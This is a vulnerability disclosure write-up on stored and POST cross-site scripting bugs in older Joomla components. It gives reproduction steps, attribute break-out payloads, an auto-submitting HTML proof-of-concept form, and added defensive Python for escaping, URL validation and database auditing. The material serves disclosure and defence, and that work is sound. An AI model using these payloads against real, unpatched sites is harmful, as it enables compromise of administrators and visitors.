Back in October 2013 I found some XSS vulnerabilities in Joomla! 3.1.2. The affected versions were Joomla! 2.5.14 and earlier 2.5.x versions, and 3.1.5 and earlier 3.0.x versions. All of these XSS vulnerabilities existed in fields where we can insert links starting with http://. I first did a simple fuzz to test the output.
<foo> </bar> '" > <> ; () //
What I noticed was that it does filter out tags, but we can still take advantage of the characters that are not filtered. Of course we can use JavaScript event handlers to trigger XSS.
'; ()//"
Persistent XSS in com_contact
To reproduce this issue follow these steps.
- Click Components -> Contacts -> Contacts. This is the URL: http://localhost/Joomla_3.1.5/administrator/index.php?option=com_contact
- Edit an existing contact or create a new contact.
- If you created a new contact, give it a proper name and click on Contact Details.
- Inject this payload into the Website field:
http://"onmouseover=alert(document.documentURI);"
and click on Save.
- Move your mouse over the Website field and you should get an alert box with the URI.
The website field is not properly sanitized and therefore it leads to a persistent XSS vulnerability. This can be used for attacking other users in the admin panel.
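The root cause is the same for all three link fields on this page (the contact Website field, the newsfeed Link field and the weblink URL field) and, in spirit, for the contact form E-Mail field further down: the value is checked for a leading http:// and stripped of tags, but the double quote survives and is written straight into an HTML attribute. The following is an added example, not Joomla's code and not from the original post. It reconstructs that weak filter as a hypothetical `render_link_vulnerable`, then shows the two defender-side fixes: HTML-attribute escaping on output (`render_link_escape_only`), which on its own keeps the payload inert, and URL validation on input (`validate_http_url`) combined with escaping (`render_link_hardened`), which also rejects the malformed value so it is never stored.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Payload quoted from the post; the only "special" characters are the quotes.
PAYLOAD = 'http://"onmouseover=alert(document.documentURI);"'

_TAG_RE = re.compile(r"<[^>]*>")
_HOST_RE = re.compile(r"[A-Za-z0-9.-]+")


def render_link_vulnerable(value: str) -> str:
    """Hypothetical reconstruction of the weak filter the post describes
    (not Joomla's code): tags are stripped and the value must start with
    http://, but the surviving double quotes are written into the href
    attribute untouched, so the payload closes the attribute early."""
    value = _TAG_RE.sub("", value)
    if not value.startswith("http://"):
        raise ValueError("link must start with http://")
    return '<a href="' + value + '">' + value + "</a>"


def render_link_escape_only(value: str) -> str:
    """Fix 1: encode for the HTML attribute context on output. quote=True
    turns " into &quot; so the value can no longer leave the attribute."""
    safe = html.escape(value, quote=True)
    return f'<a href="{safe}">{safe}</a>'


def validate_http_url(value: str) -> Optional[str]:
    """Fix 2: validate on input. Accept only absolute http(s) URLs whose
    host is a plain DNS-style name; the payload fails because its "host"
    is the quoted JavaScript, and javascript:/data: URLs fail on scheme."""
    try:
        parts = urlsplit(value)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    if _HOST_RE.fullmatch(parts.hostname) is None:
        return None
    return value


def render_link_hardened(value: str) -> str:
    """Both fixes together: reject malformed input (returning "" here; a
    real form would raise a validation error) and still escape on output."""
    url = validate_http_url(value)
    if url is None:
        return ""
    return render_link_escape_only(url)


def attribute_broken_out(markup: str) -> bool:
    """Check used to compare the renderers: an event-handler attribute is
    only a problem when a raw double quote lets it escape the href value."""
    return re.search(r'"\s*on\w+\s*=', markup) is not None


if __name__ == "__main__":
    print("vulnerable :", render_link_vulnerable(PAYLOAD))
    print("escaped    :", render_link_escape_only(PAYLOAD))
    print("hardened   :", repr(render_link_hardened(PAYLOAD)))
```

Escaping on output is the fix that actually removes the XSS; the input validation is defence in depth, and it is also what stops a component from later trying to fetch a nonsense URL, which is how the full path disclosure described below comes about.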
Infecting all viewers of the Website
That XSS is persistent, but it can only harm users inside the admin panel. To leverage this attack, why not make a new Contact page with our payload? 🙂
- Go to Menu -> Main Menu -> Add New Menu Item -> New
- Click on the Select button -> Contacts -> Single Contact.
- The page will reload with a new field named Select Contact. Click Select and click on the newly created contact with our payload stored.
- Give a Menu Title and save it.
Now if you navigate to your index page, a new menu item should have appeared with the name you gave it. Click on it and the payload should be executed. In my case I used an event handler, so move the mouse over the URL and the payload should fire.
If you want to view the payload in the back-end database, it is stored in the contact_details table. In my database the query would be:
[code language="sql"]
select id, name, webpage from alias_contact_details where id=2;
[/code]
POC Video
Persistent XSS in com_newsfeeds
To reproduce this XSS follow these steps.
- Click Components -> Newsfeeds -> Feeds. The URL: http://localhost/Joomla_3.1.5/administrator/index.php?option=com_newsfeeds
- Create a new feed or edit an existing feed.
- Give a Title if you created a new Feed.
- Inject this basic payload in the Link field:
http://"onmouseover=alert(document.documentURI);"
- Move your mouse over the Link field and you should get an alert box with the URI.
The payload is stored in the newsfeeds table in the database. In my configuration, the query to retrieve it would be:
[code language="sql"]
select id, name, link from alias_newsfeeds where id=1;
[/code]
POC Video
Bonus FPD
If you try to create a new Menu item for Newsfeeds, like we did before for the Contacts, you get a PHP error that reveals the full path. The reason is that this component tries to retrieve the feed from the malformed URL we stored; as it is not a valid URL, the fetch fails with an error.
- Go to Menu -> Main Menu -> Add New Menu Item -> New
- Click on the Select button -> Newsfeeds -> Single Newsfeed.
- The page will reload with a new field named Select Feed. Click Select and click on the newly created Newsfeed with our payload stored.
- Give a Menu Title and save it.
Once you go to the index page and click on the created menu item you should see the full path disclosure.
Persistent XSS in com_weblinks
- Click Components -> Weblinks -> Links. The URL: http://localhost/Joomla_3.1.5/administrator/index.php?option=com_weblinks
- Create a new link or edit an existing link.
- Give a Title if you created a new link.
- Inject this basic payload in the URL field:
http://"onmouseover=alert(document.documentURI);"
- Move your mouse over the URL field and you should get an alert box with the URI.
The XSS is stored in the weblinks table in the database. In my database the query would be:
[code language="sql"]
select id, title, url from alias_weblinks where id=1;
[/code]
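Once a fix is deployed, the stored payloads are still sitting in the database, so a defender will want to audit the three tables this post queries for values that could never have passed a sane URL check. The script below is an added example, not part of the post or of Joomla: it uses the column names the post gives (contact_details.webpage, newsfeeds.link, weblinks.url) and the post's `alias_` table prefix, builds a constructed in-memory SQLite database with one tainted row per table, and flags every stored link that contains attribute-breaking characters or does not parse as an absolute http(s) URL.

```python
import re
import sqlite3
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# (table, label column, url column), as named in the post's queries.
URL_FIELDS: List[Tuple[str, str, str]] = [
    ("alias_contact_details", "name", "webpage"),
    ("alias_newsfeeds", "name", "link"),
    ("alias_weblinks", "title", "url"),
]

# Characters that break out of an HTML attribute, inline event handlers,
# and javascript: URLs: none of these belong in a stored link.
SUSPICIOUS = re.compile(r"""["'<>]|on\w+\s*=|javascript:""", re.IGNORECASE)
_HOST_RE = re.compile(r"[A-Za-z0-9.-]+")


def is_clean_http_url(value: str) -> bool:
    """A stored link should be an absolute http(s) URL with a plain hostname
    and none of the characters that break out of an HTML attribute."""
    if value is None or value == "":
        return True  # an empty optional field is not suspicious
    if SUSPICIOUS.search(value):
        return False
    try:
        parts = urlsplit(value)
    except ValueError:
        return False
    return (parts.scheme in ("http", "https") and bool(parts.hostname)
            and _HOST_RE.fullmatch(parts.hostname) is not None)


def audit(conn: sqlite3.Connection) -> Dict[str, List[Tuple[int, str, str]]]:
    """Return {table: [(id, label, value), ...]} for every stored link that
    fails is_clean_http_url. Written against the DB-API, driven here with
    SQLite; on a real site the same SELECTs would run against MySQL."""
    findings: Dict[str, List[Tuple[int, str, str]]] = {}
    for table, label_col, url_col in URL_FIELDS:
        # Table and column names come from our own constant list above, not
        # from user input, so interpolating them into the query is safe.
        rows = conn.execute(f"SELECT id, {label_col}, {url_col} FROM {table}").fetchall()
        bad = [(i, lbl, val) for i, lbl, val in rows if not is_clean_http_url(val)]
        if bad:
            findings[table] = bad
    return findings


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample data (not a dump of any real site): benign rows
    plus one row per table carrying the break-out payload from the post."""
    conn = sqlite3.connect(":memory:")
    payload = 'http://"onmouseover=alert(document.documentURI);"'
    conn.executescript("""
        CREATE TABLE alias_contact_details (id INTEGER PRIMARY KEY, name TEXT, webpage TEXT);
        CREATE TABLE alias_newsfeeds (id INTEGER PRIMARY KEY, name TEXT, link TEXT);
        CREATE TABLE alias_weblinks (id INTEGER PRIMARY KEY, title TEXT, url TEXT);
    """)
    conn.executemany("INSERT INTO alias_contact_details VALUES (?, ?, ?)",
                     [(1, "Site owner", "http://example.com/"), (2, "test", payload)])
    conn.executemany("INSERT INTO alias_newsfeeds VALUES (?, ?, ?)",
                     [(1, "payload feed", payload), (2, "Joomla news", "https://www.joomla.org/")])
    conn.executemany("INSERT INTO alias_weblinks VALUES (?, ?, ?)",
                     [(1, "evil", payload), (2, "docs", "https://docs.joomla.org/"), (3, "empty", "")])
    conn.commit()
    return conn


if __name__ == "__main__":
    for table, rows in audit(build_sample_db()).items():
        for row_id, label, value in rows:
            print(f"{table} id={row_id} ({label}): {value!r}")
```

Flagged rows should be reviewed and cleaned by hand rather than deleted blindly, since a legitimate link with an unusual but harmless form (an IDN host, for instance) would also trip the strict hostname check.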
POC Video
POST XSS in com_contact
com_contact also suffers from a POST XSS vulnerability. This can't be remotely exploited because Joomla uses a CSRF token in the form. The E-Mail field is not sanitized and hence accepts any kind of input; you can basically inject HTML and JS.
For example, if we inject
"><svg/onload="alert('XSS by Osanda');"
in the E-Mail field, an alert box is returned.
I also noticed that even if we reload the page or open the URL in a new tab, the payload is still executed. Our payload lies in the source code as follows.
POC
[code language="html"]
<html>
<!-- POST XSS in com_contact POC by @OsandaMalith -->
<body>
  <form name="exploit" action="http://localhost/Joomla_3.1.5/index.php/contact" method="POST">
    <input type="hidden" name="jform[contact_name]" value="test" />
    <!-- the payload's double quotes are entity-encoded so they survive inside the value attribute -->
    <input type="hidden" name="jform[contact_email]" value="&quot;><svg/onload=&quot;alert('XSS by Osanda');&quot;" />
    <input type="hidden" name="jform[contact_subject]" value="test" />
    <input type="hidden" name="jform[contact_message]" value="test" />
    <input type="hidden" name="option" value="com_contact" />
    <input type="hidden" name="task" value="contact.submit" />
    <input type="hidden" name="return" value="" />
    <input type="hidden" name="id" value="1:test" />
    <input type="hidden" name="2b974e233b1ab7a34b82d352f3030e0a" value="1" />
    <script>document.exploit.submit();</script>
  </form>
</body>
</html>
[/code]
Joomla.org was also affected by this issue.
POC Video
Impact
All these bugs are fairly low in severity on their own, but consider a website hosted on a shared server: an attacker first gains access to website A, an ordinary vulnerable site. From there, via symlinking or gaining root, he can obtain the configuration file of website B, a Joomla site, and break into its admin panel. He can then take advantage of these XSS vulnerabilities to compromise the staff users, including the Admin, and the common visitors.
Report Timeline and Advisories
Joomla Advisories
[1] http://developer.joomla.org/security/news/570-20131101-core-xss-vulnerability
[2] http://developer.joomla.org/security/news/571-20131102-core-xss-vulnerability
[3] http://developer.joomla.org/security/news/572-20131103-core-xss-vulnerability
Secunia Advisory
[1] http://secunia.com/advisories/55573/
All these issues are fixed in Joomla 3.2.0 stable and Joomla 2.5.15.
[1] http://www.joomla.org/announcements/release-news/5516-joomla-3-2-0-stable-released.html
[2] http://www.joomla.org/announcements/release-news/5517-joomla-2-5-15-released.html
After responsible disclosure to Joomla, these issues were resolved. Special thanks to Elin Waring from the Joomla Strike Team and Dulsara Premalal for supporting me with the emails for reporting.
I love you my friend 😉
Ohh, OMG. Great find bro 😀